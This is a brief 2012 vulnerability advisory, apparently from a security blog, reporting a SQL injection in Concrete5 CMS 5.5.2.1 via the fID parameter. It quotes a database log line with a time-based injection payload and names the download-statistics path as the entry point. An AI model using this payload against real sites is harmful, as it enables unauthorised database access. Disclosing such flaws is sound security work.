[ TITLE ....... ][ Concrete 5.5.2.1 CMS - SQL Injection [ DATE ........ ][ 22.04.2012 [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http://www.concrete5.org/ [ VERSION ..... ][ 5.5.2.1 [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? SQL Injection. [--------------------------------------------[ [ 3. Where is bug :) Vulnerable parameter is fID. For example (from mysqls logs): 60832 Query insert into DownloadStatistics (fID, fvID, uID, rcID) values (NULL, 0, 1, 0) FROM Files LEFT JOIN FileVersions on Files.fID = FileVersions.fID and FileVersions.fvIsApproved = 1 WHERE Files.fID = '1 waitfor delay \'0:0:10\'--' FROM Files LEFT JOIN FileVersions on Files.fID = FileVersio Ok, so now we know that sql injection occurs in parameter for 'statistic' (if file=downloaded >+1@stats). Enjoy. [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.concrete5.org/ - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ Ask me about new projects @ mail. ;) ] [ Best regards [